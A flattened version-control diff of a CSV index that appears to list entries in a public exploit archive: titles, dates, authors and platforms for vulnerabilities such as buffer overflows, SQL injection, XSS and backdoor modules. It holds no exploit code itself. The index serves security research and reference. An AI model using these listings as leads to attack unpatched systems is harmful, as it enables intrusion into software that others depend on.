id,file,description,date,author,platform,type,port 21633,platforms/windows/remote/21633.c,"SmartMax MailMax 4.8 Popmax Buffer Overflow Vulnerability",2002-07-20,anonymous,windows,remote,0 21634,platforms/windows/dos/21634.c,"SecureCRT 2.4/3.x/4.0 SSH1 Identifier String Buffer Overflow Vulnerability (1)",2002-07-23,Kyuzo,windows,dos,0 21635,platforms/windows/remote/21635.c,"SecureCRT 2.4/3.x/4.0 SSH1 Identifier String Buffer Overflow Vulnerability (2)",2002-07-23,"andrea lisci",windows,remote,0 -21636,platforms/windows/remote/21636.txt,"Opera 6.0.1,ms Internet Explorer 5/6 JavaScript Modifier Keypress Event Subversion Vulnerability",2002-07-23,"Andreas Sandblad",windows,remote,0 +21636,platforms/windows/remote/21636.txt,"Opera 6.0.1_ms Internet Explorer 5/6 JavaScript Modifier Keypress Event Subversion Vulnerability",2002-07-23,"Andreas Sandblad",windows,remote,0 21637,platforms/hardware/dos/21637.c,"Zyxel Prestige 642R Router Malformed IP Packet Denial of Service Vulnerability",2002-07-24,"Jeff w. Roberson",hardware,dos,0 21638,platforms/multiple/remote/21638.txt,"Mozilla 0.9.x/1.0 JavaScript URL Host Spoofing Arbitrary Cookie Access Vulnerability",2002-07-24,"Andreas Sandblad",multiple,remote,0 21639,platforms/windows/remote/21639.c,"VMWare GSX Server 2.0 - Authentication Server Buffer Overflow Vulnerability",2002-07-24,"Zag & Glcs",windows,remote,0 @@ -18891,7 +18924,6 @@ id,file,description,date,author,platform,type,port 21646,platforms/php/webapps/21646.py,"Archin WordPress Theme 3.2 Unauthenticated Configuration Access",2012-10-01,bwall,php,webapps,0 21648,platforms/windows/remote/21648.txt,"Pegasus Mail 4.0 1 Message Header Buffer Overflow Vulnerability",2002-07-24,"Auriemma Luigi",windows,remote,0 21649,platforms/multiple/remote/21649.txt,"CacheFlow CacheOS 3.1.x/4.0.x/4.1 Unresolved Domain Cross-Site Scripting Vulnerability",2002-07-24,T.Suzuki,multiple,remote,0 -21650,platforms/windows/remote/21650.txt,"Microsoft SQL Server 2000 Database Consistency Checkers Buffer Overflow Vulnerability",2002-07-25,"Cesar Cerrudo",windows,remote,0 21651,platforms/windows/remote/21651.txt,"Microsoft SQL Server 2000 sp_MScopyscript SQL Injection Vulnerability",2002-07-25,"Cesar Cerrudo",windows,remote,0 21652,platforms/windows/remote/21652.cpp,"Microsoft SQL Server 2000 Resolution Service Heap Overflow Vulnerability",2002-07-25,"David Litchfield",windows,remote,0 21653,platforms/windows/remote/21653.c,"KaZaA Media Desktop 1.7.1 Large Message Denial of Service Vulnerability",2002-07-25,"Josh and omega",windows,remote,0 @@ -18909,7 +18941,7 @@ id,file,description,date,author,platform,type,port 21666,platforms/linux/local/21666.txt,"soapbox <= 0.3.1 - Local Root Exploit",2012-10-02,"Jean Pascal Pereira",linux,local,0 21667,platforms/linux/local/21667.c,"MM 1.0.x/1.1.x Shared Memory Library Temporary File Privilege Escalation Vulnerability",2002-07-29,"Sebastian Krahmer",linux,local,0 21668,platforms/php/webapps/21668.txt,"ShoutBox 1.2 Form Field HTML Injection Vulnerability",2002-07-29,delusion,php,webapps,0 -21669,platforms/bsd/local/21669.pl,"FreeBSD 4.x,NetBSD 1.4.x/1.5.x/1.6,OpenBSD 3 pppd Arbitrary File Permission Modification Race Condition",2002-07-29,"Sebastian Krahmer",bsd,local,0 +21669,platforms/bsd/local/21669.pl,"FreeBSD 4.x_NetBSD 1.4.x/1.5.x/1.6_OpenBSD 3 pppd Arbitrary File Permission Modification Race Condition",2002-07-29,"Sebastian Krahmer",bsd,local,0 21670,platforms/windows/remote/21670.txt,"Microsoft Windows Media Player 6/7 Filename Buffer Overflow Vulnerability",2002-07-30,ken@FTU,windows,remote,0 21671,platforms/unix/remote/21671.c,"OpenSSL SSLv2 - Malformed Client Key Remote Buffer Overflow Vulnerability (1)",2002-07-30,spabam,unix,remote,0 21672,platforms/unix/remote/21672.c,"OpenSSL SSLv2 - Malformed Client Key Remote Buffer Overflow Vulnerability (2)",2002-07-30,spabam,unix,remote,0 @@ -18932,7 +18964,7 @@ id,file,description,date,author,platform,type,port 21689,platforms/windows/local/21689.c,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error Vulnerability (6)",2002-08-06,"Brett Moore",windows,local,0 21690,platforms/windows/local/21690.txt,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error Vulnerability (7)",2002-08-06,"Ovidio Mallo",windows,local,0 21691,platforms/windows/local/21691.txt,"Microsoft Windows 2000/NT 4/XP - Window Message Subsystem Design Error Vulnerability (8)",2002-08-06,anonymous,windows,local,0 -21692,platforms/windows/remote/21692.txt,"Microsoft Internet Explorer 5/6,Konqueror 2.2.2/3.0,Weblogic Server 5/6/7 Invalid X.509 Certificate Chain",2002-08-06,"Mike Benham",windows,remote,0 +21692,platforms/windows/remote/21692.txt,"Microsoft Internet Explorer 5/6_Konqueror 2.2.2/3.0_Weblogic Server 5/6/7 Invalid X.509 Certificate Chain",2002-08-06,"Mike Benham",windows,remote,0 21693,platforms/windows/remote/21693.nasl,"Microsoft SQL Server 2000 User Authentication Remote Buffer Overflow Vulnerability",2002-08-06,"Dave Aitel",windows,remote,0 21694,platforms/windows/remote/21694.pl,"602Pro LAN SUITE 2002 Telnet Proxy Localhost Denial of Service Vulnerability",2002-08-03,"Stan Bubrouski",windows,remote,0 21695,platforms/windows/remote/21695.pl,"Qualcomm Eudora 5/6 File Attachment Spoofing Vulnerability (1)",2002-08-08,"Paul Szabo",windows,remote,0 @@ -18977,6 +19009,7 @@ id,file,description,date,author,platform,type,port 21735,platforms/windows/remote/21735.txt,"Abyss Web Server 1.0 Encoded Backslash Directory Traversal Vulnerability",2002-08-22,"Auriemma Luigi",windows,remote,0 21736,platforms/hardware/dos/21736.txt,"LG LR3100p 1.30 Series Router IP Packet Flags Denial of Service Vulnerability",2002-08-22,"Lukasz Bromirski",hardware,dos,0 21737,platforms/windows/dos/21737.txt,"Cyme ChartFX Client Server ActiveX Control Array Indexing Vulnerability",2012-10-04,"Francis Provencher",windows,dos,0 +21834,platforms/php/webapps/21834.rb,"phpMyAdmin 3.5.2.2 server_sync.php Backdoor",2012-10-10,metasploit,php,webapps,0 21739,platforms/windows/dos/21739.pl,"JPEGsnoop <= 1.5.2 WriteAV Crash PoC",2012-10-04,"Jean Pascal Pereira",windows,dos,0 21740,platforms/php/webapps/21740.txt,"phpmychat plus 1.94 rc1 - Multiple Vulnerabilities",2012-10-04,L0n3ly-H34rT,php,webapps,0 21741,platforms/windows/dos/21741.txt,"XnView 1.99.1 JLS File Decompression Heap Overflow",2012-10-04,"Joseph Sheridan",windows,dos,0 @@ -19023,10 +19056,7 @@ id,file,description,date,author,platform,type,port 21782,platforms/multiple/dos/21782.txt,"Oracle 8.1.x/9.0/9.2 TNS Listener Service_CurLoad Remote Denial of Service",2002-09-09,"Rapid 7",multiple,dos,0 21783,platforms/php/webapps/21783.txt,"phpGB 1.1/1.2 PHP Code Injection Vulnerability",2002-09-09,ppp-design,php,webapps,0 21784,platforms/linux/remote/21784.c,"Netris 0.3/0.4/0.5 - Remote Memory Corruption Vulnerability",2002-09-09,V9,linux,remote,0 -21785,platforms/windows/dos/21785.pl,"HCView WriteAV Crash PoC",2012-10-07,"Jean Pascal Pereira",windows,dos,0 -21786,platforms/php/webapps/21786.php,"Blog Mod <= 0.1.9 (index.php, month parameter) SQL Injection",2012-10-07,WhiteCollarGroup,php,webapps,0 -21787,platforms/php/webapps/21787.rb,"MyAuth3 - Blind SQL Injection",2012-10-07,"Marcio Almeida",php,webapps,0 -21788,platforms/windows/dos/21788.pl,"FastStone Image Viewer 4.6 - ReadAVonIP Crash PoC",2012-10-07,"Jean Pascal Pereira",windows,dos,0 +21786,platforms/php/webapps/21786.php,"Blog Mod <= 0.1.9 (index.php month parameter) SQL Injection",2012-10-07,WhiteCollarGroup,php,webapps,0 21789,platforms/windows/dos/21789.txt,"Alleged Outlook Express 5/6 Link Denial of Service Vulnerability",2002-09-09,"Stefano Zanero",windows,dos,0 21790,platforms/unix/local/21790.sh,"Cobalt RaQ authenticate Local Privilege Escalation Vulnerability",2002-06-28,"Charles Stevenson",unix,local,0 21791,platforms/hardware/dos/21791.txt,"Enterasys SSR8000 SmartSwitch Port Scan Denial of Service Vulnerability",2002-09-13,"Mella Marco",hardware,dos,0 @@ -19058,7 +19088,13 @@ id,file,description,date,author,platform,type,port 21817,platforms/php/webapps/21817.txt,"Rudi Benkovic JAWMail 1.0 Script Injection Vulnerability",2002-09-23,"Ulf Harnhammar",php,webapps,0 21818,platforms/linux/remote/21818.c,"Null HTTPd 0.5 - Remote Heap Overflow Vulnerability",2002-09-23,eSDee,linux,remote,0 21819,platforms/windows/dos/21819.c,"Trillian 0.74 IRC Raw Messages Denial of Service Vulnerability",2002-09-22,"Lance Fitz-Herbert",windows,dos,0 +21882,platforms/unix/remote/21882.txt,"Apache Tomcat 3.2 - Directory Disclosure Vulnerability",2002-10-01,"HP Security",unix,remote,0 +21883,platforms/windows/remote/21883.html,"Microsoft Internet Explorer 5 Document Reference Zone Bypass Vulnerability",2002-10-01,"Liu Die Yu",windows,remote,0 +21884,platforms/unix/local/21884.txt,"Sendmail 8.12.x SMRSH Double Pipe Access Validation Vulnerability",2002-10-01,zen-parse,unix,local,0 +21885,platforms/multiple/remote/21885.txt,"Apache 1.3/2.0.x Server Side Include Cross-Site Scripting Vulnerability",2002-10-02,mattmurphy,multiple,remote,0 +21886,platforms/php/webapps/21886.txt,"Py-Membres 3.1 Index.PHP Unauthorized Access Vulnerability",2002-10-02,frog,php,webapps,0 21821,platforms/windows/dos/21821.c,"Trillian 0.74 IRC PART Message Denial of Service Vulnerability",2002-09-22,"Lance Fitz-Herbert",windows,dos,0 +21881,platforms/bsd/local/21881.txt,"Rogue 5.3 - Local Buffer Overflow Vulnerability",2002-09-30,stanojr@iserver.sk,bsd,local,0 21822,platforms/multiple/webapps/21822.txt,"Endpoint Protector 4.0.4.0 - Multiple Vulnerabilities",2012-10-09,Vulnerability-Lab,multiple,webapps,0 21823,platforms/windows/dos/21823.c,"Trillian 0.74 IRC Oversized Data Block Buffer Overflow Vulnerability",2002-09-22,"Lance Fitz-Herbert",windows,dos,0 21824,platforms/windows/dos/21824.pl,"Arctic Torrent 1.2.3 Memory Corruption (DoS)",2012-10-09,"Jean Pascal Pereira",windows,dos,0 @@ -19068,9 +19104,7 @@ id,file,description,date,author,platform,type,port 21828,platforms/hardware/dos/21828.txt,"HP Procurve 4000M Switch Device Reset Denial of Service Vulnerability",2002-09-24,"Brook Powers",hardware,dos,0 21829,platforms/php/webapps/21829.txt,"XOOPS 1.0 RC3 HTML Injection Vulnerability",2002-09-24,das@hush.com,php,webapps,0 21830,platforms/windows/dos/21830.py,"Gom Player 2.1.44.5123 (Unicode) NULL Pointer Dereference",2012-10-09,wh1ant,windows,dos,0 -21831,platforms/windows/local/21831.c,"PLIB 1.8.5 ssg/ssgParser.cxx Buffer Overflow",2012-10-09,"Andrs Gmez",windows,local,0 -21833,platforms/php/webapps/21833.rb,"PhpTax pfilez Parameter Exec Remote Code Injection",2012-10-10,metasploit,php,webapps,0 -21834,platforms/php/webapps/21834.rb,"phpMyAdmin 3.5.2.2 server_sync.php Backdoor",2012-10-10,metasploit,php,webapps,0 +21831,platforms/windows/local/21831.c,"PLIB 1.8.5 ssg/ssgParser.cxx Buffer Overflow",2012-10-09,"Andrés Gómez",windows,local,0 21835,platforms/php/webapps/21835.rb,"qdPM 7.0 - Arbitrary PHP File Upload Vulnerability",2012-10-10,metasploit,php,webapps,0 21836,platforms/linux/webapps/21836.rb,"Auxilium RateMyPet Arbitrary File Upload Vulnerability",2012-10-10,metasploit,linux,webapps,0 21837,platforms/windows/remote/21837.rb,"InduSoft Web Studio Arbitrary Upload Remote Code Execution",2012-10-10,metasploit,windows,remote,4322 @@ -19103,6 +19137,7 @@ id,file,description,date,author,platform,type,port 21864,platforms/php/webapps/21864.txt,"PHPWebSite 0.8.3 News Message HTML Injection Vulnerability",2002-09-25,das@hush.com,php,webapps,0 21865,platforms/linux/local/21865.c,"Interbase 5/6 GDS_Lock_MGR UMask File Permission Changing Vulnerability",2002-09-25,grazer,linux,local,0 21866,platforms/multiple/webapps/21866.txt,"ServersCheck Monitoring Software 9.0.12 / 9.0.14 - Stored XSS",2012-10-10,loneferret,multiple,webapps,0 +21891,platforms/php/webapps/21891.txt,"vOlk Botnet Framework 4.0 - Multiple Vulnerabilities",2012-10-11,Vulnerability-Lab,php,webapps,0 21868,platforms/ios/remote/21868.rb,"Apple iOS MobileSafari LibTIFF Buffer Overflow",2012-10-09,metasploit,ios,remote,0 21869,platforms/ios/remote/21869.rb,"Apple iOS MobileMail LibTIFF Buffer Overflow",2012-10-09,metasploit,ios,remote,0 21870,platforms/linux/remote/21870.txt,"Zope 2.x Incorrect XML-RPC Request Information Disclosure Vulnerability",2002-09-26,"Rossen Raykov",linux,remote,0 @@ -19116,17 +19151,10 @@ id,file,description,date,author,platform,type,port 21878,platforms/cgi/webapps/21878.txt,"EmuMail 5.0 Email Form Script Injection Vulnerability",2002-09-29,FVS,cgi,webapps,0 21879,platforms/java/webapps/21879.txt,"Sun ONE Starter Kit 2.0 / ASTAware SearchDisc 3.1 - Search Engine Directory Traversal Vulnerability",2002-09-30,"ET LoWNOISE",java,webapps,0 21880,platforms/multiple/remote/21880.txt,"Monkey HTTP Server 0.1/0.4/0.5 - Multiple Cross-Site Scripting Vulnerabilities",2002-09-30,DownBload,multiple,remote,0 -21881,platforms/bsd/local/21881.txt,"Rogue 5.3 - Local Buffer Overflow Vulnerability",2002-09-30,stanojr@iserver.sk,bsd,local,0 -21882,platforms/unix/remote/21882.txt,"Apache Tomcat 3.2 - Directory Disclosure Vulnerability",2002-10-01,"HP Security",unix,remote,0 -21883,platforms/windows/remote/21883.html,"Microsoft Internet Explorer 5 Document Reference Zone Bypass Vulnerability",2002-10-01,"Liu Die Yu",windows,remote,0 -21884,platforms/unix/local/21884.txt,"Sendmail 8.12.x SMRSH Double Pipe Access Validation Vulnerability",2002-10-01,zen-parse,unix,local,0 -21885,platforms/multiple/remote/21885.txt,"Apache 1.3/2.0.x Server Side Include Cross-Site Scripting Vulnerability",2002-10-02,mattmurphy,multiple,remote,0 -21886,platforms/php/webapps/21886.txt,"Py-Membres 3.1 Index.PHP Unauthorized Access Vulnerability",2002-10-02,frog,php,webapps,0 21887,platforms/windows/local/21887.php,"PHP 5.3.4 Win Com Module Com_sink Exploit",2012-10-11,fb1h2s,windows,local,0 21888,platforms/windows/remote/21888.rb,"KeyHelp ActiveX LaunchTriPane Remote Code Execution Vulnerability",2012-10-11,metasploit,windows,remote,0 21889,platforms/windows/dos/21889.pl,"VLC Player <= 2.0.3 - (.png) ReadAV Crash PoC",2012-10-11,"Jean Pascal Pereira",windows,dos,0 21890,platforms/php/webapps/21890.txt,"Omnistar Document Manager 8.0 - Multiple Vulnerabilities",2012-10-11,Vulnerability-Lab,php,webapps,0 -21891,platforms/php/webapps/21891.txt,"vOlk Botnet Framework 4.0 - Multiple Vulnerabilities",2012-10-11,Vulnerability-Lab,php,webapps,0 21892,platforms/windows/local/21892.txt,"FileBound 6.2 Privilege Escalation Vulnerability",2012-10-11,"Nathaniel Carew",windows,local,0 21893,platforms/php/webapps/21893.php,"TightAuction 3.0 Config.INC Information Disclosure Vulnerability",2002-10-02,frog,php,webapps,0 21894,platforms/php/webapps/21894.txt,"Midicart PHP Information Disclosure Vulnerability",2002-10-02,frog,php,webapps,0 @@ -19151,6 +19179,7 @@ id,file,description,date,author,platform,type,port 21913,platforms/windows/remote/21913.txt,"Citrix Published Applications - Information Disclosure Vulnerability",2002-10-07,wire,windows,remote,0 21914,platforms/asp/webapps/21914.txt,"SSGBook 1.0 Image Tag HTML Injection Vulnerabilities",2002-10-08,frog,asp,webapps,0 21915,platforms/windows/dos/21915.txt,"Symantec Norton Personal Firewall 2002/ Kaspersky Labs Anti-Hacker 1.0/BlackIce Server Protection 3.5/BlackICE Defender 2.9 - Auto Block DoS Weakness",2002-10-08,"Yiming Gong",windows,dos,0 +33403,platforms/windows/dos/33403.py,"Intellicom 1.3 - 'NetBiterConfig.exe' 'Hostname' Data Remote Stack Buffer Overflow Vulnerability",2009-12-14,"Ruben Santamarta ",windows,dos,0 21918,platforms/php/webapps/21918.html,"VBZoom 1.0 - Remote SQL Injection Vulnerability",2002-10-08,hish,php,webapps,0 21919,platforms/unix/remote/21919.sh,"Sendmail 8.12.6 Trojan Horse Vulnerability",2002-10-08,netmask,unix,remote,0 21920,platforms/asp/webapps/21920.txt,"Microsoft Content Management Server 2001 - Cross-Site Scripting Vulnerability",2002-10-09,overclocking_a_la_abuela,asp,webapps,0 @@ -19161,8 +19190,8 @@ id,file,description,date,author,platform,type,port 21925,platforms/asp/webapps/21925.txt,"SurfControl SuperScout Email Filter 3.5 User Credential Disclosure Vulnerability",2002-10-08,ken@FTU,asp,webapps,0 21926,platforms/cgi/webapps/21926.txt,"Authoria HR Suite AthCGI.EXE Cross-Site Scripting Vulnerability",2002-10-09,Max,cgi,webapps,0 21927,platforms/multiple/remote/21927.rb,"Metasploit < 4.4 - pcap_log Plugin Privilege Escalation Exploit",2012-10-12,0a29406d9794e4f9b30b3c5d6702c708,multiple,remote,0 -21929,platforms/php/webapps/21929.rb,"Project Pier Arbitrary File Upload Vulnerability",2012-10-16,metasploit,php,webapps,0 21930,platforms/php/webapps/21930.txt,"PHPReactor 1.2.7 pl1 Browse.PHP Cross-Site Scripting Vulnerability",2002-10-10,"Arab VieruZ",php,webapps,0 +21929,platforms/php/webapps/21929.rb,"Project Pier Arbitrary File Upload Vulnerability",2012-10-16,metasploit,php,webapps,0 21931,platforms/php/webapps/21931.txt,"PHPBBMod 1.3.3 PHPInfo Information Disclosure Vulnerability",2002-10-10,"Roland Verlander",php,webapps,0 21932,platforms/windows/remote/21932.pl,"Microsoft Outlook Express 5.5/6.0 S/MIME Buffer Overflow Vulnerability",2002-10-10,"Noam Rathaus",windows,remote,0 21933,platforms/php/webapps/21933.txt,"PHPRank 1.8 Add.PHP Cross-Site Scripting Vulnerability",2002-10-10,"Jedi/Sector One",php,webapps,0 @@ -19210,7 +19239,7 @@ id,file,description,date,author,platform,type,port 21975,platforms/hardware/dos/21975.txt,"Linksys BEFSR41 1.4x Gozila.CGI Denial of Service Vulnerability",2002-11-01,"Jeep 94",hardware,dos,0 21976,platforms/php/webapps/21976.txt,"Jason Orcutt Prometheus 3.0/4.0/6.0 - Remote File Include Vulnerability",2002-11-01,"Karol Wiesek",php,webapps,0 21977,platforms/php/webapps/21977.txt,"PHP-Nuke 5.6 Modules.PHP SQL Injection Vulnerability",2002-11-01,kill9,php,webapps,0 -21978,platforms/hardware/dos/21978.txt,"Linksys WAP11 1.3/1.4,D-Link DI-804 4.68/Dl-704 2.56 b5 Embedded HTTP Server DoS Vulnerability",2002-11-01,"Mark Litchfield",hardware,dos,0 +21978,platforms/hardware/dos/21978.txt,"Linksys WAP11 1.3/1.4_D-Link DI-804 4.68/Dl-704 2.56 b5 Embedded HTTP Server DoS Vulnerability",2002-11-01,"Mark Litchfield",hardware,dos,0 21979,platforms/cgi/webapps/21979.txt,"ION Script 1.4 - Remote File Disclosure Vulnerability",2002-11-01,"Zero X",cgi,webapps,0 21980,platforms/linux/local/21980.c,"Abuse 2.0 - Local Buffer Overflow Vulnerability",2002-11-01,Girish,linux,local,0 21981,platforms/windows/dos/21981.txt,"Monkey HTTP Server 0.4/0.5 Invalid POST Request Denial of Service Vulnerability",2002-11-02,anonymous,windows,dos,0 @@ -19234,9 +19263,9 @@ id,file,description,date,author,platform,type,port 22000,platforms/cgi/remote/22000.txt,"Zeus Web Server 4.0/4.1 Admin Interface Cross-Site Scripting Vulnerability",2002-11-08,euronymous,cgi,remote,0 22001,platforms/windows/remote/22001.txt,"Simple Web Server 0.5.1 File Disclosure Vulnerability",2002-11-08,"Tamer Sahin",windows,remote,0 22002,platforms/linux/local/22002.txt,"QNX RTOS 6.2 Application Packager Non-Explicit Path Execution Vulnerability",2002-11-08,Texonet,linux,local,0 -22003,platforms/php/webapps/22003.txt,"MyBB Profile Albums Plugin 0.9 (albums.php, album parameter) - SQL Injection",2012-10-16,Zixem,php,webapps,0 +22003,platforms/php/webapps/22003.txt,"MyBB Profile Albums Plugin 0.9 (albums.php album parameter) - SQL Injection",2012-10-16,Zixem,php,webapps,0 22004,platforms/php/webapps/22004.txt,"Joomla iCagenda Component - (id parameter) Multiple Vulnerabilities",2012-10-16,Dark-Puzzle,php,webapps,0 -22005,platforms/hardware/webapps/22005.txt,"visual tools dvr <= 3.0.6.16, vx series <= 4.2.19.2 - Multiple Vulnerabilities",2012-10-16,"Andrea Fabrizi",hardware,webapps,0 +22005,platforms/hardware/webapps/22005.txt,"visual tools dvr <= 3.0.6.16_ vx series <= 4.2.19.2 - Multiple Vulnerabilities",2012-10-16,"Andrea Fabrizi",hardware,webapps,0 22006,platforms/windows/dos/22006.txt,"Ezhometech EzServer 7.0 - Remote Heap Corruption Vulnerability",2012-10-16,"Lorenzo Cantoni",windows,dos,0 22007,platforms/windows/remote/22007.txt,"Samsung Kies 2.3.2.12054_20 - Multiple Vulnerabilities",2012-10-16,"High-Tech Bridge SA",windows,remote,0 22009,platforms/php/webapps/22009.txt,"EZ Systems HTTPBench 1.1 Information Disclosure Vulnerability",2002-11-11,"Tacettin Karadeniz",php,webapps,0 @@ -19298,19 +19327,17 @@ id,file,description,date,author,platform,type,port 22065,platforms/php/webapps/22065.html,"phpBB 2.0.3 - search.php Cross-Site Scripting Vulnerability",2002-12-03,f_a_a,php,webapps,0 22066,platforms/linux/local/22066.c,"Exim Internet Mailer 3.35/3.36/4.10 Format String Vulnerability",2002-12-04,"Thomas Wana",linux,local,0 22067,platforms/unix/local/22067.txt,"SAP DB 7.3.00 - Symbolic Link Vulnerability",2002-12-04,"SAP Security",unix,local,0 -22068,platforms/unix/dos/22068.pl,"Apache 1.3.x,Tomcat 4.0.x/4.1.x Mod_JK Chunked Encoding Denial of Service Vulnerability",2002-12-04,Sapient2003,unix,dos,0 +22068,platforms/unix/dos/22068.pl,"Apache 1.3.x & Tomcat 4.0.x/4.1.x Mod_JK - Chunked Encoding Denial of Service Vulnerability",2002-12-04,Sapient2003,unix,dos,0 22069,platforms/multiple/local/22069.py,"Oracle Database Authentication Protocol Security Bypass",2012-10-18,"Esteban Martinez Fayo",multiple,local,0 22070,platforms/windows/webapps/22070.py,"otrs 3.1 - Stored XSS Vulnerability",2012-10-18,"Mike Eduard",windows,webapps,0 22071,platforms/php/webapps/22071.txt,"FireStorm Professional Real Estate Wordpress Plugin 2.06.01 SQL Injection Vulnerability",2012-10-18,"Ashiyane Digital Security Team",php,webapps,0 -22072,platforms/linux/remote/22072.c,"Cobalt RaQ4 Administrative Interface Command Execution Vulnerability",2002-12-05,grazer,linux,remote,0 -22073,platforms/php/webapps/22073.txt,"APBoard 2.0 2 Unauthorized Thread Reading Vulnerability",2002-12-06,"DNA ESC",php,webapps,0 22074,platforms/osx/local/22074.txt,"Apple Mac OS X 10.2.2 - Directory Kernel Panic Denial of Service",2002-11-07,shibby,osx,local,0 22075,platforms/php/webapps/22075.txt,"Ultimate PHP Board 1.0 final beta ViewTopic.PHP Directory Contents Browsing",2002-11-08,euronymous,php,webapps,0 22076,platforms/php/webapps/22076.txt,"Ultimate PHP Board Board 1.0 final beta ViewTopic.PHP Cross-Site Scripting Vulnerability",2002-11-08,euronymous,php,webapps,0 22077,platforms/php/webapps/22077.txt,"vBulletin 2.2.7/2.2.8 HTML Injection Vulnerability",2002-11-09,"Dorin Balanica",php,webapps,0 22078,platforms/windows/remote/22078.txt,"mollensoft software enceladus server suite 2.6.1/3.9 - Directory Traversal",2002-11-09,luca.ercoli@inwind.it,windows,remote,0 22079,platforms/linux/dos/22079.sh,"ProFTPD 1.2.x STAT Command Denial of Service Vulnerability",2002-12-09,"Rob klein Gunnewiek",linux,dos,0 -22080,platforms/php/webapps/22080.txt,"Xoops 1.3.5 Private Message System Font Attributes HTML Injection",2002-11-09,"fred magistrat",php,webapps,0 +22080,platforms/php/webapps/22080.txt,"Xoops 1.3.5 - Private Message System Font Attributes HTML Injection",2002-11-09,"fred magistrat",php,webapps,0 22081,platforms/windows/dos/22081.pl,"Mollensoft Software Enceladus Server Suite 3.9 FTP Command Buffer Overflow",2002-12-09,"Tamer Sahin",windows,dos,0 22082,platforms/windows/remote/22082.pl,"Trend Micro PC-cillin 2000/2002/2003 Mail Scanner Buffer Overflow Vulnerability",2002-12-10,"Joel Soderberg",windows,remote,0 22083,platforms/php/webapps/22083.txt,"Deerfield VisNetic WebSite 3.5.13.1 - Cross-Site Scripting Vulnerability",2002-12-12,"Ory Segal",php,webapps,0 @@ -19326,7 +19353,7 @@ id,file,description,date,author,platform,type,port 22093,platforms/multiple/remote/22093.py,"ManageEngine Security Manager Plus <= 5.5 build 5505 - Remote SYSTEM/root SQLi",2012-10-19,xistence,multiple,remote,0 22094,platforms/windows/remote/22094.rb,"ManageEngine Security Manager Plus <= 5.5 build 5505 - Remote SYSTEM SQLi (MSF)",2012-10-19,xistence,windows,remote,0 22097,platforms/php/webapps/22097.txt,"Joomla Freestyle Support 1.9.1.1447 (com_fss) SQL Injection",2012-10-19,D4NB4R,php,webapps,0 -22098,platforms/php/webapps/22098.txt,"Joomla Tags (index.php, tag parameter) SQL Injection",2012-10-19,D4NB4R,php,webapps,0 +22098,platforms/php/webapps/22098.txt,"Joomla Tags (index.php tag parameter) SQL Injection",2012-10-19,D4NB4R,php,webapps,0 22099,platforms/php/webapps/22099.txt,"CMSQLITE 1.3.2 - Multiple Vulnerabiltiies",2012-10-19,Vulnerability-Lab,php,webapps,0 22100,platforms/windows/dos/22100.txt,"Internet Explorer 9 - XSS Filter Bypass",2012-10-19,"Jean Pascal Pereira",windows,dos,0 22101,platforms/linux/remote/22101.c,"zkfingerd 0.9.1 say() Format String Vulnerability",2002-12-16,"Marceta Milos",linux,remote,0 @@ -19347,19 +19374,19 @@ id,file,description,date,author,platform,type,port 22116,platforms/php/webapps/22116.txt,"N/X Web Content Management System 2002 Prerelease 1 datasets.php c_path Parameter LFI",2003-01-02,frog,php,webapps,0 22117,platforms/windows/dos/22117.txt,"iCal 3.7 Malformed HTTP Request Denial of Service Vulnerability",2003-01-03,"securma massine",windows,dos,0 22118,platforms/windows/dos/22118.txt,"iCal 3.7 - Remote Buffer Overflow Vulnerability",2003-01-03,"securma massine",windows,dos,0 -22119,platforms/windows/dos/22119.html,"Microsoft PoCket Internet Explorer 3.0 - Denial of Service Vulnerability",2003-01-03,"Christopher Sogge Røtnes",windows,dos,0 +22119,platforms/windows/dos/22119.html,"Microsoft PoCket Internet Explorer 3.0 - Denial of Service Vulnerability",2003-01-03,"Christopher Sogge Røtnes",windows,dos,0 22120,platforms/solaris/local/22120.c,"Sun Solaris 2.5.1/2.6/7.0/8/9 Wall Spoofed Message Origin Vulnerability",2003-01-03,"Brant Roman",solaris,local,0 22121,platforms/windows/dos/22121.pl,"EType EServ 2.9x FTP Remote Denial of Service Vulnerability",2003-01-04,D4rkGr3y,windows,dos,0 22122,platforms/windows/dos/22122.pl,"EType EServ 2.9x POP3 - Remote Denial of Service Vulnerability",2003-01-04,D4rkGr3y,windows,dos,0 22123,platforms/windows/dos/22123.pl,"EType EServ 2.9x SMTP Remote Denial of Service Vulnerability",2003-01-04,D4rkGr3y,windows,dos,0 22124,platforms/windows/dos/22124.pl,"EType EServ 1.9x NNTP Remote Denial of Service Vulnerability",2003-01-04,D4rkGr3y,windows,dos,0 -22125,platforms/php/webapps/22125.txt,"OpenTopic 2.3.1 Private Message HTML Injection Vulnerability",2003-01-06,frog,php,webapps,0 +22125,platforms/php/webapps/22125.txt,"OpenTopic 2.3.1 - Private Message HTML Injection Vulnerability",2003-01-06,frog,php,webapps,0 22126,platforms/php/webapps/22126.txt,"DCP-Portal 5.0.1 editor.php Root Parameter Remote File Inclusion",2003-01-06,frog,php,webapps,0 22127,platforms/php/webapps/22127.txt,"DCP-Portal 5.0.1 lib.php Root Parameter Remote File Inclusion",2003-01-06,frog,php,webapps,0 22128,platforms/linux/local/22128.c,"H-Sphere Webshell 2.4 - Local Root Exploit",2003-01-06,"Carl Livitt",linux,local,0 22129,platforms/linux/remote/22129.c,"H-Sphere Webshell 2.4 - Remote Root Exploit",2003-01-06,"Carl Livitt",linux,remote,0 22130,platforms/multiple/remote/22130.txt,"AN HTTPD 1.41 e Cross-Site Scripting Vulnerability",2003-01-06,D4rkGr3y,multiple,remote,0 -22131,platforms/unix/remote/22131.pl,"Linux Kernel 2.0.x/2.2.x/2.4.x,FreeBSD 4.x Network Device Driver Frame Padding Information Disclosure",2007-03-23,"Jon Hart",unix,remote,0 +22131,platforms/unix/remote/22131.pl,"Linux Kernel 2.0.x/2.2.x/2.4.x_FreeBSD 4.x Network Device Driver Frame Padding Information Disclosure",2007-03-23,"Jon Hart",unix,remote,0 22132,platforms/windows/dos/22132.txt,"Microsoft Windows XP/2000 Fontview Denial of Service Vulnerability",2003-01-06,andrew,windows,dos,0 22133,platforms/php/webapps/22133.txt,"myPHPNuke 1.8.8 Default_Theme Cross-Site Scripting Vulnerability",2003-01-06,Mindwarper,php,webapps,0 22134,platforms/php/webapps/22134.txt,"S8Forum 3.0 - Remote Command Execution Vulnerability",2003-01-06,nmsh_sa,php,webapps,0 @@ -19379,13 +19406,13 @@ id,file,description,date,author,platform,type,port 22148,platforms/php/webapps/22148.txt,"phpPass 2 AccessControl.PHP SQL Injection Vulnerability",2003-01-13,frog,php,webapps,0 